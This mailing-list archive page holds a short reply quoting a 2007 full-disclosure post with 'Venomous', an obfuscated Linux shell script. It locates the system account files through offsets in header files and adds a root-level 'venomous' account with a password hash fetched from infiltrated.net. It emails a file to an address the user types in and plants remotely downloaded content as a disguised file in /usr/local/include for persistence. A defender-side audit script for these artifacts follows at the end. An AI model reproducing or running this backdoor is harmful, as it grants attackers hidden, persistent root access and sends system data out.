Open Source and information security mailing list archives
 
Date: Mon, 14 May 2007 08:47:39 +0800
From: "Just1n T1mberlake" <hotpackets@...lokitty.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux big bang theory....

Confirmed: Mac OS X is not vulnerable to this.

just1n

--
NeXT is one of my best friends, Love & Sincerity

Mac OS X Evangelist
Public Relations of NeXus


> ----- Original Message -----
> From: "J. Oquendo" <sil@...iltrated.net>
> To: "full-disclosure" <full-disclosure@...ts.grok.org.uk>
> Subject: [Full-disclosure] Linux big bang theory....
> Date: Wed, 09 May 2007 17:42:52 -0400
> 
> 
> Enjoy||Complain
> 
> # !/bin/sh
> # Venomous
> # Linux PoC backdoor keeper...
> # http://www.infiltrated.net/ubuntuDestruction.php
> # J. Oquendo (c) 05/09/2007
> # If you have to ask you shouldn't run this
> # password for venomous is password
> 
> 
> happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
> days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
> guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
> sed -n '1p' $happy|awk -F ":" 
> 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
> sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F 
> ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
> what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
> who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, 
> ""){print $4" -a"}'`
> echo "Enter your email address" ; read ans ; where=$ans
> $who | $what $where
> 
> 
> # Ugly method to keep a root account Follows... For those not in the know...
> # Venomous was an idea made to prove a point, not give script kiddiots another
> # tool to be morons with. Instead of ruining things, how about solving...
> # Instead of naysaying... Prove me wrong
> 
> 
> # Pick a ranDumb file in /usr/includes/ then create the same backdoor on the
> # system using this filename. Do something sneaky on your own to place this
> # file on a startup I could show you, but then I would have to kill -9 you
> 
> # Note the location... Highly doubtable to remove an actual include file
> # unless some stupid admin did something really dumb... Before someone mouths
> # around via e-mail... I could have written this all inclusively but I chose
> # not to for obvious reasons...
> 
> random=`date|awk -F : '{print $3}'|awk '{print $1}'`
> echo $random > /tmp/secCommand
> sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' 
> /tmp/secCommand|sed -n '1p'`
> rm /tmp/secCommand
> filename=`echo $sad|sh|awk -F . '{print $1}'`
> 
> lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n 
> '226,233p' >> /usr/local/include/$filename.h
> 
> # Now of course I could have modified this to replicate any one of the files
> # on startup but again... PoC ... The naysayers will ramble on about "You're
> # out of your mind..." Am I? I've given you the PoC's what more do you want...
> # Ubuntu or any Linux for the lowly home user is a horrible idea...
> 
> # And AGAIN before someone fires off "I would see the URL and that's a dead
> # giveaway!" ... Look, I'm trying to make a point here... I "could have"
> # a functioning backdoor undetectable to most integrity checkers, Samhain,
> # Tripwire etc., but why should I disclose this anywhere. It's not in the
> # best interest of anyone to do so... Don't bother asking for it via email
> # because it's not public and will never be...
> 
> # This again... Was to prove a point to the naysayers who this shit doesn't
> # happen... Keep dreaming. It's only a matter of time before you guys go
> # Goo Goo about getting Linux for Idjits off the ground, but it's a horrible
> # mistake in the making
> 
> 
> -- ====================================================
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> echo infiltrated.net|sed 's/^/sil@/g' "Wise men talk because they 
> have something to say;
> fools, because they have to say something." -- Plato
> << smime.p7s >>
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
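
A defender-side check for the two artifacts the quoted script's comments describe, a kept root account named venomous and a header-named file written under /usr/local/include. This is an added example, not part of either post; the function names, sample entries and temporary paths are constructed, and the account files are assumed to follow the passwd(5)/shadow(5) layout.

```shell
#!/bin/sh
# Added defensive example; not code from the original thread.

# Report non-root UID 0 accounts and empty password fields.
audit_accounts() {  # usage: audit_accounts PASSWD_FILE SHADOW_FILE
    awk -F: '$3 == 0 && $1 != "root" { print "UID0 " $1 }
             NF >= 2 && $2 == ""     { print "EMPTY_PW passwd " $1 }' "$1"
    awk -F: 'NF >= 2 && $2 == "" { print "EMPTY_PW shadow " $1 }' "$2"
}

# List *.h files in LOCAL_DIR whose stem (name before the first dot)
# matches an entry in SYS_DIR, e.g. /usr/local/include vs /usr/include.
shadowed_headers() {  # usage: shadowed_headers SYS_DIR LOCAL_DIR
    for f in "$2"/*.h; do
        [ -e "$f" ] || continue
        stem=$(basename "$f" .h)
        for s in "$1"/*; do
            [ -e "$s" ] || continue
            name=$(basename "$s")
            if [ "${name%%.*}" = "$stem" ]; then
                echo "SHADOWED $f"
                break
            fi
        done
    done
}

# Constructed sample data so the checks can be run offline.
make_sample() {  # usage: make_sample DIR
    mkdir -p "$1/sys" "$1/local"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/sh' \
                  'alice:x:1000:1000::/home/alice:/bin/sh' \
                  'venomous:x:0:0:root:/root:/bin/sh' > "$1/passwd"
    printf '%s\n' 'root:!:13642:0:99999:7:::' \
                  'alice:!:13642:0:99999:7:::' \
                  'venomous::13642:0:99999:7:::' > "$1/shadow"
    : > "$1/sys/stdio.h";   : > "$1/sys/errno.h"
    : > "$1/local/stdio.h"; : > "$1/local/mylib.h"
}

d=$(mktemp -d)
make_sample "$d"
audit_accounts "$d/passwd" "$d/shadow"
shadowed_headers "$d/sys" "$d/local"
rm -rf "$d"
```

On a live host the same functions take `/etc/passwd`, `/etc/shadow`, `/usr/include` and `/usr/local/include` as arguments; a SHADOWED hit is a lead to review, since locally built software can legitimately install same-named headers.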

